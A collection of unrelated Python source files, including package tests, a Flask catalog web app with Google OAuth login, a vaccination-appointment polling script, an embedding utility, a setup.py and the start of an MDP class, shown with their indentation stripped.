"""Tests for kfp.v2.google.client._cloud_function_create_pipeline_job."""
import datetime
import json
import os
import unittest
from kfp.v2.google.client import _cloud_function_templated_http_request
class CloudFunctionCreatePipelineJobTest(unittest.TestCase):
def test_preprocess(self):
test_data_path = os.path.join(
os.path.dirname(__file__),
'testdata',
)
function_request_path = os.path.join(
test_data_path,
'pipeline1_request_body.json',
)
expected_pipeline_request_path = os.path.join(
test_data_path,
'pipeline1_request_body_final.json',
)
with open(function_request_path, 'rb') as f:
function_request = f.read()
with open(expected_pipeline_request_path, 'r') as f:
expected_pipeline_request = json.load(f)
(_, _, resolved_request_body
) = _cloud_function_templated_http_request._preprocess_request_body(
function_request, time=datetime.datetime(2020, 8, 1, 12, 34))
actual_pipeline_request = json.loads(resolved_request_body)
self.assertEqual(actual_pipeline_request, expected_pipeline_request)
if __name__ == '__main__':
unittest.main()
|
StarcoderdataPython
|
397448
|
# Copyright (C) 2009 Canonical Ltd
# Licenced under the txaws licence available at /LICENSE in the txaws source.
from twisted.trial.unittest import TestCase
from txaws.ec2 import model
class SecurityGroupTestCase(TestCase):
def test_creation_defaults(self):
group = model.SecurityGroup("sg-a3f2", "name", "desc")
self.assertEquals(group.id, "sg-a3f2")
self.assertEquals(group.name, "name")
self.assertEquals(group.description, "desc")
self.assertEquals(group.owner_id, "")
self.assertEquals(group.allowed_groups, [])
self.assertEquals(group.allowed_ips, [])
def test_creation_all_parameters(self):
user = "somegal24"
other_groups = [
model.SecurityGroup("sg-other1", "other1", "another group 1"),
model.SecurityGroup("sg-other2", "other2", "another group 2")]
user_group_pairs = [
model.UserIDGroupPair(user, other_groups[0].name),
model.UserIDGroupPair(user, other_groups[1].name)]
ips = [model.IPPermission("tcp", "80", "80", "10.0.1.0/24")]
group = model.SecurityGroup(
"id", "name", "desc", owner_id="me", groups=user_group_pairs, ips=ips)
self.assertEquals(group.id, "id")
self.assertEquals(group.name, "name")
self.assertEquals(group.description, "desc")
self.assertEquals(group.owner_id, "me")
self.assertEquals(group.allowed_groups[0].user_id, "somegal24")
self.assertEquals(group.allowed_groups[0].group_name, "other1")
self.assertEquals(group.allowed_groups[1].user_id, "somegal24")
self.assertEquals(group.allowed_groups[1].group_name, "other2")
self.assertEquals(group.allowed_ips[0].cidr_ip, "10.0.1.0/24")
class UserIDGroupPairTestCase(TestCase):
def test_creation(self):
user_id = "cowboy22"
group_name = "Rough Riders"
user_group_pair = model.UserIDGroupPair(user_id, group_name)
self.assertEquals(user_group_pair.user_id, "cowboy22")
self.assertEquals(user_group_pair.group_name, "Rough Riders")
|
StarcoderdataPython
|
1844356
|
<filename>api.py
"""
This is the main Flask application for Danslist.
All endpoints were built using Flask for routing functionality,
Jinja2 for templating, and SQLAlchemy for database interaction.
"""
# Imports
from functools import wraps
from flask import (Flask, render_template, redirect, url_for,
request, jsonify, flash, make_response)
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.exc import SQLAlchemyError
import bleach
from flask import session as login_session
import random
import string
from oauth2client.client import (flow_from_clientsecrets,
FlowExchangeError)
import httplib2
import json
import requests
from setup import Base, User, Category, Item
from queryhelpers import (getCategories, getCategory,
getItems, getCategoryItems,
getItem)
# Copy your Google oauth2 credentials to client_secrets.json
CLIENT_ID = json.loads(
open('client_secrets.json', 'r').read())['web']['client_id']
APPLICATION_NAME = "Danslist"
app = Flask(__name__)
# From root directory of this application,
# run python db/setup.py to create database.
engine = create_engine('sqlite:///catalog.db', pool_pre_ping=True)
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
# Initializing DBSession() at beginning of each function to avoid Flask error.
def loginRequired(f):
"""
Checks to see if user_id is currently in login_session.
Wraps this check in a decorator.
:return:
decorator function if condition met.
Redirect if not.
"""
@wraps(f)
def decorated_function(*args, **kwargs):
if 'user_id' in login_session:
return f(*args, **kwargs)
else:
flash("You must login first.")
return redirect(url_for('showLogin'))
return decorated_function
def adminRequired(f):
"""
Checks to see if is_admin flag is set to true in login_session.
Wraps this check in a decorator.
:return:
Decorator function if condition met.
Redirect if not.
"""
@wraps(f)
def decorated_function(*args, **kwargs):
if 'is_admin' in login_session and login_session['is_admin']:
return f(*args, **kwargs)
else:
flash("You don't have access to that.")
return redirect(url_for('Catalog'))
return decorated_function
@app.route('/')
@app.route('/catalog')
def Catalog():
"""
Retrieves all items from newest to oldest.
Retrieves all categories.
Returns Home page.
"""
session = DBSession()
categories = getCategories(session)
items = getItems(session)
username = (login_session['username']
if 'username' in login_session.keys()
else None)
return render_template('catalog.html', categories=categories,
username=username, items=items)
@app.route('/catalog/JSON')
def CatalogJSON():
"""
Retrieve all categories and their associated items.
:return:
JSON-formatted list of categories with each
category containing a list of items.
"""
session = DBSession()
categories = getCategories(session)
return jsonify(categories=[r.serialize_items for r in categories])
@app.route('/catalog/items/JSON')
def CatalogItemsJSON():
"""
Retrieve all items in alphabetic order.
:return:
JSON-formatted list of items.
"""
session = DBSession()
items = getItems(session)
return jsonify(items=[r.serialize for r in items])
@app.route('/catalog/<string:category_name>/items')
def CategoryItems(category_name):
"""
View the items for a particular category.
:param category_name: string
:return:
HTML page of a particular category's items.
"""
session = DBSession()
category = getCategory(category_name, session)
categories = getCategories(session)
items = getCategoryItems(category.id, session)
username = (login_session['username']
if 'username' in login_session.keys()
else None)
return render_template('catalog.html',
items=items,
categories=categories,
username=username,
category=category)
@app.route('/catalog/<string:category_name>/items/JSON')
def CategoryItemsJSON(category_name):
"""
View the items for a particular category in JSON
:param category_name: string
:return:
JSON-formatted category and its items.
"""
session = DBSession()
    category = getCategory(category_name, session)
return jsonify(category=category.serialize_items)
# Admin access only.
@app.route('/categories')
def Categories():
"""
    View all categories and potential actions for them.
:return:
HTML page of categories.
"""
session = DBSession()
categories = session.query(Category).all()
return render_template('categories.html', categories=categories)
@app.route('/categories/JSON')
def CategoriesJSON():
"""
View all categories in JSON
:return:
JSON-formatted list of categories.
"""
session = DBSession()
categories = getCategories(session)
return jsonify(categories=[r.serialize for r in categories])
@app.route('/categories/new', methods=['GET', 'POST'])
@adminRequired
def newCategory():
"""
Create a new category.
:return:
HTML page or redirect
"""
session = DBSession()
if request.method == 'GET':
return render_template('newcategory.html')
if request.method == 'POST':
new_category = Category(
name=bleach.clean(request.form['name'])
)
session.add(new_category)
session.commit()
flash(new_category.label + " created.")
return redirect(url_for('Categories'))
@app.route('/categories/<string:category_name>/edit', methods=['GET', 'POST'])
@adminRequired
def editCategory(category_name):
"""
Edit an existing category.
:param category_name: (string)
:return:
HTML page or redirect
"""
if 'is_admin' not in login_session or not login_session['is_admin']:
flash("You don't have access to that.")
return redirect(url_for('Catalog'))
session = DBSession()
category = getCategory(category_name, session)
if request.method == 'GET':
return render_template('editcategory.html', category=category)
if request.method == 'POST':
category.label = bleach.clean(request.form['name'])
category.name = category.label.lower()
session.add(category)
session.commit()
flash(category.label + " updated.")
return redirect(url_for('Categories'))
@app.route('/categories/<string:category_name>/delete',
methods=['GET', 'POST'])
@adminRequired
def deleteCategory(category_name):
"""
Delete an existing category.
:param category_name: (string)
:return:
Redirect
"""
if 'is_admin' not in login_session or not login_session['is_admin']:
flash("You don't have access to that.")
return redirect(url_for('Catalog'))
session = DBSession()
category = getCategory(category_name, session)
if request.method == 'GET':
return render_template('deletecategory.html', category=category)
if request.method == 'POST':
session.delete(category)
session.commit()
flash(category.label + " deleted.")
return redirect(url_for('Categories'))
@app.route('/catalog/items/new', methods=['GET', 'POST'])
@app.route('/catalog/<string:category_name>/items/new',
methods=['GET', 'POST'])
@loginRequired
def newItem(category_name=None):
"""
Create a new item for category.
:param category_name: (string)
:return:
HTML page
"""
session = DBSession()
categories = getCategories(session)
category = None
if category_name:
category = getCategory(category_name, session)
if request.method == 'GET':
return render_template('newitem.html',
category=category, categories=categories)
if request.method == 'POST':
new_item = Item(
label=bleach.clean(request.form['name']),
description=bleach.clean(request.form['description']),
category_id=bleach.clean(request.form['category']),
user_id=login_session['user_id']
)
new_item = addItem(new_item, session)
flash(new_item.label + " created.")
if category:
return redirect(url_for('CategoryItems',
category_name=category.name))
return redirect(url_for('Catalog'))
def addItem(new_item, session):
"""
Add item to database.
    :param new_item: (Item) the Item object to persist.
    :param session: (DBSession) the current session created by DBSession()
    :return:
        the Item object after post-processing.
"""
new_item.name = new_item.label.lower()
if len(new_item.name) < 1:
raise ValueError('Name cannot be empty.')
session.add(new_item)
session.commit()
return new_item
@app.route('/catalog/<string:category_name>/item/<string:item_name>')
def viewItem(category_name, item_name):
"""
View a particular item from a category.
:param category_name: (string)
:param item_name: (string)
:return:
HTML page
"""
session = DBSession()
category = getCategory(category_name, session)
item = getItem(category.id, item_name, session)
username = None
user_id = None
if 'username' in login_session:
username = login_session['username']
user_id = login_session['user_id']
return render_template('viewitem.html',
item=item, category=category,
username=username, user_id=user_id)
@app.route('/catalog/<string:category_name>/item/<string:item_name>/JSON')
def viewItemJSON(category_name, item_name):
"""
View a particular item from a category in JSON
:param category_name: (string)
:param item_name: (string)
:return:
JSON-formatted http response
"""
session = DBSession()
category = getCategory(category_name, session)
item = getItem(category.id, item_name, session)
return jsonify(item=item.serialize)
@app.route('/catalog/<string:category_name>/item/<string:item_name>/edit',
methods=['GET', 'POST'])
@loginRequired
def editItem(category_name, item_name):
"""
Edit an existing item.
:param category_name: (string)
:param item_name: (string)
:return:
HTML page or redirect
"""
if 'user_id' not in login_session:
return redirect(url_for('showLogin'))
session = DBSession()
category = getCategory(category_name, session)
item = getItem(category.id, item_name, session)
if login_session['user_id'] != item.user_id:
return "You don't have access to this item."
categories = session.query(Category).order_by(Category.name).all()
if request.method == 'GET':
return render_template('edititem.html', category=category,
categories=categories, item=item)
if request.method == 'POST':
item.label = bleach.clean(request.form['name'])
item.description = bleach.clean(request.form['description'])
item.category_id = bleach.clean(request.form['category'])
item = addItem(item, session)
flash(item.label + " updated.")
return redirect(url_for('CategoryItems', category_name=category.name))
@app.route('/catalog/<string:category_name>/item/<string:item_name>/delete',
methods=['GET', 'POST'])
@loginRequired
def deleteItem(category_name, item_name):
"""
Delete an existing item
:param category_name: (string)
:param item_name: (string)
:return:
HTML page or redirect
"""
session = DBSession()
category = getCategory(category_name, session)
item = getItem(category.id, item_name, session)
if login_session['user_id'] != item.user_id:
return "You don't have access to this item."
if request.method == 'GET':
return render_template('deleteitem.html',
category=category, item=item)
if request.method == 'POST':
session.delete(item)
session.commit()
flash(item.label + " deleted.")
return redirect(url_for('CategoryItems',
                                category_name=category.name))
@app.route('/login')
def showLogin():
"""
Generate an state token and display the login page.
"""
# Create anti-forgery state token
state = ''.join(random.choice(string.ascii_uppercase + string.digits)
for x in xrange(32))
login_session['state'] = state
return render_template('login.html', STATE=state)
@app.route('/gconnect', methods=['POST'])
def gconnect():
"""
Using Google's OAUTH2 service, validate and initiate a session.
The session data is saved in Flask session.
:return:
"Done!"
"""
# Validate state token
if request.args.get('state') != login_session['state']:
response = make_response(json.dumps('Invalid state parameter.'), 401)
response.headers['Content-Type'] = 'application/json'
return response
# Obtain authorization code
code = request.data
try:
# Upgrade the authorization code into a credentials object
oauth_flow = flow_from_clientsecrets('client_secrets.json', scope='')
oauth_flow.redirect_uri = 'postmessage'
credentials = oauth_flow.step2_exchange(code)
except FlowExchangeError:
response = make_response(
json.dumps('Failed to upgrade the authorization code.'), 401)
response.headers['Content-Type'] = 'application/json'
return response
# Check that the access token is valid.
access_token = credentials.access_token
url = ('https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=%s'
% access_token)
h = httplib2.Http()
result = json.loads(h.request(url, 'GET')[1])
# If there was an error in the access token info, abort.
if result.get('error') is not None:
response = make_response(json.dumps(result.get('error')), 500)
response.headers['Content-Type'] = 'application/json'
return response
# Verify that the access token is used for the intended user.
gplus_id = credentials.id_token['sub']
if result['user_id'] != gplus_id:
response = make_response(
json.dumps("Token's user ID doesn't match given user ID."), 401)
response.headers['Content-Type'] = 'application/json'
return response
# Verify that the access token is valid for this app.
if result['issued_to'] != CLIENT_ID:
response = make_response(
json.dumps("Token's client ID does not match app's."), 401)
print "Token's client ID does not match app's."
response.headers['Content-Type'] = 'application/json'
return response
stored_access_token = login_session.get('access_token')
stored_gplus_id = login_session.get('gplus_id')
if stored_access_token is not None and gplus_id == stored_gplus_id:
response = make_response(
json.dumps('Current user is already connected.'), 200)
response.headers['Content-Type'] = 'application/json'
return response
# Store the access token in the session for later use.
login_session['access_token'] = credentials.access_token
login_session['gplus_id'] = gplus_id
# Get user info
userinfo_url = "https://www.googleapis.com/oauth2/v1/userinfo"
params = {'access_token': credentials.access_token, 'alt': 'json'}
answer = requests.get(userinfo_url, params=params)
data = answer.json()
login_session['provider'] = 'google'
login_session['username'] = data['name']
login_session['email'] = data['email']
# Check if user exists.
user_id = getUserId(login_session['email'])
# If not, create User.
if user_id is None:
user_id = createUser(login_session)
login_session['user_id'] = user_id
userinfo = getUserInfo(user_id)
login_session['is_admin'] = userinfo.is_admin
output = 'Done!'
flash("you are now logged in as %s" % login_session['username'])
return output
# Disconnect based on provider
@app.route('/disconnect')
def disconnect():
"""
Revoke the current auth session token.
Delete existing login_session data.
:return:
redirect
"""
if 'provider' in login_session:
if login_session['provider'] == 'google':
gdisconnect()
del login_session['gplus_id']
del login_session['access_token']
del login_session['username']
del login_session['email']
del login_session['user_id']
del login_session['provider']
flash("You have successfully been logged out.")
return redirect(url_for('Catalog'))
else:
flash("You were not logged in")
return redirect(url_for('Catalog'))
@app.route('/gdisconnect')
def gdisconnect():
"""
Revoke the current user's google auth token.
:return:
JSON 200 "Successfully disconnected" response
"""
# Only disconnect a connected user.
access_token = login_session.get('access_token')
if access_token is None:
response = make_response(
json.dumps('Current user not connected.'), 401)
response.headers['Content-Type'] = 'application/json'
return response
url = 'https://accounts.google.com/o/oauth2/revoke?token=%s' % access_token
h = httplib2.Http()
result = h.request(url, 'GET')[0]
if result['status'] == '200':
response = make_response(json.dumps('Successfully disconnected.'), 200)
response.headers['Content-Type'] = 'application/json'
return response
else:
        response = make_response(
            json.dumps('Failed to revoke token for given user.'), 400)
response.headers['Content-Type'] = 'application/json'
return response
def createUser(login_session):
"""
Create a new user in database table 'user'
:param login_session: (DBSession) login_session
:return:
User.id integer from newly created user row.
"""
session = DBSession()
newUser = User(email=login_session['email'])
session.add(newUser)
session.commit()
user = session.query(User).filter_by(email=login_session['email']).one()
return user.id
def getUserId(email):
"""
Retrieve an existing user id using an email address
:param email: (string)
:return:
User.id integer
"""
session = DBSession()
try:
user = session.query(User).filter_by(email=email).one()
return user.id
except SQLAlchemyError:
return None
def getUserInfo(id):
"""
Retrieve an existing user's data.
:param id: (integer) User.id
:return:
'user' row data
"""
session = DBSession()
try:
user = session.query(User).filter_by(id=id).one()
return user
except SQLAlchemyError:
return None
if __name__ == '__main__':
app.secret_key = ''.join(random.choice(
string.ascii_uppercase + string.digits) for x in xrange(32))
app.debug = True
app.run(host='0.0.0.0', port=5000)
# Uncomment for https
# app.run(host='0.0.0.0', port=5000, ssl_context='adhoc')
|
StarcoderdataPython
|
3233500
|
import sys
import beepy
import datetime as dt
import os
import time
from random import randint
import http.client
import json
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
"""
This Script uses an API endpoint to determine if a vaccination is available.
This Script assumes:
1. You already got your registration code
2. You used your registration code for the appropriate vaccination center while tracking your network.
You then caught your authentication credentials (check readme)
"""
#Config
########
registration_code_sindelfinden = "" # insert registration code
authorization_sindelfinden = "Basic " # insert authentication credential
########
payload={}
headers = \
{
'Connection': 'keep-alive',
'sec-ch-ua': '" Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"',
'Accept': 'application/json, text/plain, */*',
'Cache-Control': 'no-cache',
'Authorization': "",
'sec-ch-ua-mobile': '?0',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36',
'Content-Type': 'application/json',
'Sec-Fetch-Site': 'same-origin',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Dest': 'empty',
'Referer': "",
'Accept-Language': 'de-DE,de;q=0.9',
}
# list with dicts.
# each dict contains the info to get an appointment at one vaccination center
# you have to reference the correct data for each vaccination center.
info_list= \
[
{
"Stadt": "Sindelfinden",
"url": "229-iz.impfterminservice.de",
"plz" : "71065",
'Authorization': f'{authorization_sindelfinden}',
'Referer': f'https://229-iz.impfterminservice.de/impftermine/suche/{registration_code_sindelfinden}/71065',
},
# {
# "Stadt": "Heidelberg",
# "url": "001-iz.impfterminservice.de",
# "plz" : "69124",
# 'Authorization': f'Basic {}',
# 'Referer': f'https://001-iz.impfterminservice.de/impftermine/suche/{}/69124',
# },
]
def call_request_dict():
"""
Check API if a vaccination appintment is available in the requested center for your registration code.
If an appointmenr is available there will be an audio notification.
:return: boolean or string
booloean: False if appointment was not found
string: If appointmenr was found, the string will contain the url to the vaccination center with
the registration-code included in the URL.
"""
for dic in info_list:
headers["Authorization"] = dic["Authorization"]
headers["Referer"] = dic["Referer"]
print(f"{dt.datetime.now()} requesting : {dic['Referer']}")
conn = http.client.HTTPSConnection(dic["url"])
payload = ''
conn.request("GET", f"/rest/suche/impfterminsuche?plz={dic['plz']}", payload, headers)
response = conn.getresponse()
response_byte = response.read()
response_str = response_byte.decode("utf-8")
#print(response.json())
        if response.getcode() != 200:
            print(response.status)
continue
response_dict = json.loads(response_str)
if ( (len(response_dict["termine"]) > 0) or (len(response_dict["termineTSS"]) > 0) or \
(len(response_dict["praxen"].keys()) > 0) ):
print(dic["Stadt"], response_dict)
beepy.beep(sound=4)
return dic["Referer"]
return False
def create_browser_site(url):
"""
Creates a chrome instance if an appointment was found.
:param url: string
url to the vaccination center. URL will include registration code
:return: selenium.webdriver
instance of webdriver. This is required to keep Chrome open, after this script leaved this function.
"""
chrome_options = Options()
chrome_options.add_experimental_option("detach", True)
driver = webdriver.Chrome(driver_path, options=chrome_options)
valid_str = "termine suchen"
str_found = False
while str_found == False:
driver.get(url)
body = driver.find_elements_by_tag_name("body")[0]
time.sleep(2)
str_found = valid_str in body.text.lower()
if str_found == True:
print("blub")
break
return driver
if __name__ == "__main__":
# you need to have chrome installed. Chromedriver must be in the same directory as this script
if os.name == "nt":
driver_path = ".\chromedriver.exe"
driver = webdriver.Chrome("./chromedriver")
result = False
while result == False:
result = call_request_dict()
if result != False:
create_browser_site(result)
quit()
sys.exit()
break
time.sleep(randint(8, 13))
|
StarcoderdataPython
|
8117854
|
<filename>tests/test_cinefiles.py
import pytest, os, shutil
import glob
from pprint import pprint
from lxml import html
import cinefiles.cinefiles as cf
def test_import():
import cinefiles
movies = [ '5th Element','Amour','Astronaut Farmer',
'Down Periscope','Grand Budapest Hotel, The (2014)',
'Interstellar (2014)','Invisible War, The',
'Men Who Stare at Goats, The','Mulan (1998)',
'Soylent Green (1973)','Thin Red Line']
@pytest.fixture(scope='module')
def directoryA(tmpdir_factory):
testbed = tmpdir_factory.mktemp('testA')
for m in movies:
tempmovie = testbed.mkdir('/'+m).join('/movie.mp4')
tempmovie.write('movie code')
return testbed
def test_directoryA(directoryA):
assert os.path.exists(str(directoryA)+'/Thin Red Line/movie.mp4')
@pytest.fixture(scope='module')
def examples(tmpdir_factory):
safe_examples = tmpdir_factory.mktemp('safe_examples')
shutil.copytree('examples',str(safe_examples)+'/examples')
return safe_examples.join('examples')
def test_safe_examples_dir(examples):
assert os.path.exists(str(examples)+'/run_cf.py')
@pytest.mark.skipif(os.environ['LOGNAME'] == 'holland',
reason="Don't run on home computer")
def test_examplerunA(directoryA, examples, monkeypatch):
monkeypatch.chdir(examples)
import cinefiles.cinefiles as cf
import logging
search = cf.Cinefiles(configfile=str(examples)+'/cinefiles.ini')
#we must change searchfolder to temporary directory
search.configdict.update({'searchfolder':str(directoryA)})
search.run()
#check basic structure
for item in directoryA.listdir():
if(item.isdir()):
foldername = str(item).split('/')[-1]
print(foldername)
if(foldername != 'cinefiles' and foldername != '.cinefiles'):
index = item.join('/index.htm')
assert index.exists()
@pytest.fixture(scope='session')
def dirA_complete(tmpdir_factory):
testbed = tmpdir_factory.mktemp('testA_complete')
for m in movies:
tempmovie = testbed.mkdir('/'+m).join('/movie.mp4')
tempmovie.write('movie code')
search = cf.Cinefiles(searchfolder=str(testbed))
search.run()
return testbed
@pytest.mark.skipif(os.environ['LOGNAME'] == 'holland',
reason="Don't run on home computer")
def test_checkarchive(dirA_complete, monkeypatch):
monkeypatch.chdir(dirA_complete)
assert dirA_complete.join('/5th Element/index.htm').exists()
newsearch = cf.Cinefiles(searchfolder=str(dirA_complete))
# newsearch.run()
it = os.scandir(str(dirA_complete))
for entry in it:
if entry.is_dir():
subit = os.scandir(entry.path)
for subentry in subit:
if(subentry.name == 'archive.log' or subentry.name == '.archive.log'):
assert newsearch.checkarchive(subentry)
#all of these movies have all 3 reviews
moviesB = [ '5th Element','Grand Budapest Hotel, The (2014)',
'Interstellar (2014)','Thin Red Line']
@pytest.fixture(scope='session')
def directoryB(tmpdir_factory):
testbed = tmpdir_factory.mktemp('testB')
for m in moviesB:
tempmovie = testbed.mkdir('/'+m).join('/movie.mp4')
tempmovie.write('movie code')
search = cf.Cinefiles(searchfolder=str(testbed))
search.run()
return testbed
@pytest.mark.skipif(os.environ['LOGNAME'] == 'holland',
reason="Don't run on home computer")
def test_metadata(directoryB):
newsearch = cf.Cinefiles(searchfolder=str(directoryB))
for m in moviesB:
pathobj = directoryB.join('/'+m)
resultdict = newsearch.getattrfrommetadata(str(pathobj))
print(str(pathobj))
for key in resultdict:
if(key != 'indexfile'):
#indexfile is set later
print(key)
assert resultdict[key] != ''
@pytest.mark.skipif(os.environ['LOGNAME'] == 'holland',
reason="Don't run on home computer")
def test_masterindex_imdb(directoryB):
masterindex = directoryB.join('/index.htm')
htmlstring = ''
for line in masterindex.readlines():
htmlstring += line
tree = html.fromstring(htmlstring)
results = tree.xpath('//td[@class="rowimdb"]')
for r in results:
assert r.text_content != ''
@pytest.mark.skipif(os.environ['LOGNAME'] == 'holland',
reason="Don't run on home computer")
def test_masterindex_meta(directoryB):
masterindex = directoryB.join('/index.htm')
htmlstring = ''
for line in masterindex.readlines():
htmlstring += line
tree = html.fromstring(htmlstring)
results = tree.xpath('//td[@class="rowmeta"]')
for r in results:
assert r.text_content != ''
@pytest.mark.skipif(os.environ['LOGNAME'] == 'holland',
reason="Don't run on home computer")
def test_masterindex_roger(directoryB):
masterindex = directoryB.join('/index.htm')
htmlstring = ''
for line in masterindex.readlines():
htmlstring += line
tree = html.fromstring(htmlstring)
results = tree.xpath('//td[@class="rowroger"]')
for r in results:
assert r.text_content != ''
@pytest.fixture(scope='function')
def min_ini(tmpdir_factory):
minimal = tmpdir_factory.mktemp('minimal')
config = minimal.join('/cinefiles.ini')
config.write('[cinefiles]\n searchfolder=none\n')
return minimal
def test_no_args(min_ini,monkeypatch):
monkeypatch.chdir(min_ini)
tc = cf.Cinefiles()
assert tc.configdict['searchfolder'] == 'none'
@pytest.fixture(scope='function')
def blank_folder(tmpdir_factory):
return tmpdir_factory.mktemp('blank')
def test_no_conf(blank_folder,monkeypatch):
monkeypatch.chdir(blank_folder)
with pytest.raises(IOError) as err:
tc = cf.Cinefiles()
@pytest.fixture(scope='function')
def broken_ini(tmpdir_factory):
broken = tmpdir_factory.mktemp('minimal')
config = broken.join('/cinefiles.ini')
config.write('\n')
return broken
def test_broken_conf(broken_ini,monkeypatch):
monkeypatch.chdir(broken_ini)
with pytest.raises(ValueError) as err:
tc = cf.Cinefiles()
def test_onwindows():
assert not cf.running_on_windows()
def test_main(script_runner):
ret = script_runner.run('./cinefiles')
def test_fullsetup():
full = cf.Cinefiles(guess=False,skip=False,test=False,destroy=False,
debugnum=3,localresources=False,searchfolder=False)
for key in {'guess','skip','test','destroy','localresources','searchfolder'}:
assert full.configdict[key] == False
assert full.configdict['debugnum'] == 3
def recurseprint(directoryobj,tabnum=0):
for item in directoryobj.listdir():
print('\t'*tabnum+item.basename, end='')
if(item.isdir()):
print('/')
recurseprint(item,tabnum+1)
else:
print('')
|
StarcoderdataPython
|
11266130
|
<reponame>michael-huber2772/portfolio-dashboard
# Generated by Django 3.1.2 on 2020-10-27 10:59
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('app', '0002_product_productprice'),
]
operations = [
migrations.AlterField(
model_name='productprice',
name='start_date',
field=models.DateTimeField(default=datetime.datetime(2020, 10, 27, 4, 59, 6, 739693), null=True),
),
]
|
StarcoderdataPython
|
5097647
|
<filename>utils/embedding_utils.py
import numpy as np
import gensim
class Embedding:
def __init__(self, f, corpus, max_document_length):
if ".txt" in f:
model = gensim.models.KeyedVectors.load_word2vec_format(f, binary=False)
else:
model = gensim.models.KeyedVectors.load_word2vec_format(f, binary=True)
wordSet = set(['"'])
for sen in corpus:
words = sen.split()
for w in words:
if w in model:
wordSet.add(w)
vocab_size = len(wordSet)
print("%d unique tokens have been found!" % vocab_size)
embedding_dim = model.syn0.shape[1]
word2id = {"<PAD>":0}
id2word = {0:"<PAD>"}
word2id = {"<UNK>":1}
id2word = {1:"<UNK>"}
embedding = np.zeros((vocab_size+2, embedding_dim))
np.random.seed(0)
#embedding[0, :] = np.random.uniform(-1, 1, embedding_dim)
embedding[1, :] = np.random.uniform(-1, 1, embedding_dim)
for i, word in enumerate(wordSet):
word2id[word] = i+2
id2word[i+2] = word
embedding[i+2, :] = model[word]
self.vocab_size = vocab_size + 2
self.embedding_dim = embedding_dim
self.word2id = word2id
self.id2word = id2word
self.embedding = embedding
self.max_document_length = max_document_length
self.position_size = self.max_document_length * 2 + 1
def _text_transform(self, s, maxlen):
if not isinstance(s, str):
s = ""
words = s.split()
vec = []
for w in words:
if w == "''":
w = '"'
if w in self.word2id:
vec.append(self.word2id[w])
else:
vec.append(1)
for i in range(len(words), maxlen):
vec.append(0)
return vec[:maxlen]
def _len_transform(self, s, maxlen):
if not isinstance(s, str):
s = ""
length = len(s.split())
return min(length, maxlen)
def text_transform(self, s):
return self._text_transform(s, self.max_document_length)
def len_transform(self, s):
return self._len_transform(s, self.max_document_length)
def position_transform(self, s):
x1, y1, x2, y2 = s
vec1 = []
vec2 = []
for i in range(self.max_document_length):
if i < x1:
vec1.append(i-x1)
elif i > y1:
vec1.append(i-y1)
else:
vec1.append(0)
if i < x2:
vec2.append(i-x2)
elif i > y2:
vec2.append(i-y2)
else:
vec2.append(0)
vec1 = [np.clip(p+self.max_document_length, 0, self.position_size-1) for p in vec1]
vec2 = [np.clip(p+self.max_document_length, 0, self.position_size-1) for p in vec2]
return [vec1, vec2]
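# Minimal usage sketch (illustrative only, not part of the original module); the vector file,
# corpus, and max_document_length below are placeholder assumptions.
#
#     emb = Embedding("vectors.bin", corpus=["the first sentence", "another sentence"],
#                     max_document_length=100)
#     ids = emb.text_transform("the first sentence")        # padded list of word ids
#     length = emb.len_transform("the first sentence")      # token count, clipped to the maximum
#     pos1, pos2 = emb.position_transform((0, 0, 2, 2))     # relative-position features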
|
StarcoderdataPython
|
1791557
|
from setuptools import setup
def readme():
with open('README.md') as f:
README = f.read()
return README
setup(
name='master-slave',
version='1.0.0',
description='package to communicate with infected devices trought a local network',
long_description=readme(),
long_description_content_type='text/markdown',
url='https://github.com/Skorii/ProjetPython2019',
author='Arnaud "Skorii" Gony',
license="MIT",
classifiers=[
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
],
packages=['master_slave'],
include_package_data=True,
    # Only third-party dependencies belong here; the remaining imports (argparse, datetime,
    # logging, os, platform, re, shutil, socket, threading, time, uuid) are part of the
    # Python standard library and must not be listed for pip to install.
    install_requires=['psutil', 'requests'],
entry_points={
"console_scripts": [
"master = master_slave.master:main",
"slave = master_slave.slave:main",
],
},
)
|
StarcoderdataPython
|
3549887
|
<filename>Security/src/proj_brlp.py
import csv
import cvxopt
from cvxopt import solvers
import numpy as np
A_mat = []
R_mat = []
alpha = []
G = []
h = []
high_entropy_policy = []
class State:
def __init__(self, ind, name, actions):
self.index = ind
self.name = name
self.possibleActions = actions
self.transition = []
self.reward = []
self.terminating = False
self.utility = 0
def __repr__(self):
return "Index: " + str(self.index) + " Name: " + self.name + " Actions: " + str(self.possibleActions)
#def __str__(self):
# print "Index: " + str(self.index) + " Name: " + self.name + " Actions: " + str(self.possibleActions)
def modifyActions(self, actions):
self.possibleActions = actions
def setTransition(self, tran):
self.transition = tran
def getTransition(self):
return self.transition
def setReward(self, reward):
self.reward = reward
def getReward(self):
return self.reward
def getIndex(self):
return self.index
def getPossibleActions(self):
return self.possibleActions
def setPossibleActions(self, act):
self.possibleActions = act
def isTerminating(self):
return self.terminating
def setTerminating(self, term):
self.terminating = term
if term == True:
self.possibleActions = []
def setUtility(self, util):
self.utility = util
def getUtility(self):
return self.utility
class Action:
def __init__(self, ind, name):
self.index = ind
self.name = name
def __repr__(self):
return "Index: " + str(self.index) + " Name: " + self.name
def getIndex(self):
return self.index
class MDP:
def __init__(self, numberOfStates, numberOfActions):
self.numberOfStates = numberOfStates
self.numberOfActions = numberOfActions
self.numberOfOptions = 0
self.states = []
self.actions = []
self.options = []
# Define Action
def initializeActions(self):
for i in xrange(0, self.numberOfActions):
a = Action(i, str("a" + str(i)))
self.actions.append(a)
# Define States
def initializeStates(self):
for i in xrange(0, self.numberOfStates):
x = State(i, str("s" + str(i)), self.actions[0:self.numberOfActions-1])
self.states.append(x)
self.states[3].setTerminating(True)
self.states[3].setUtility(1)
self.states[3].setPossibleActions([self.actions[self.numberOfActions-1]])
self.states[7].setTerminating(True)
self.states[7].setUtility(-1)
self.states[7].setPossibleActions([self.actions[self.numberOfActions - 1]])
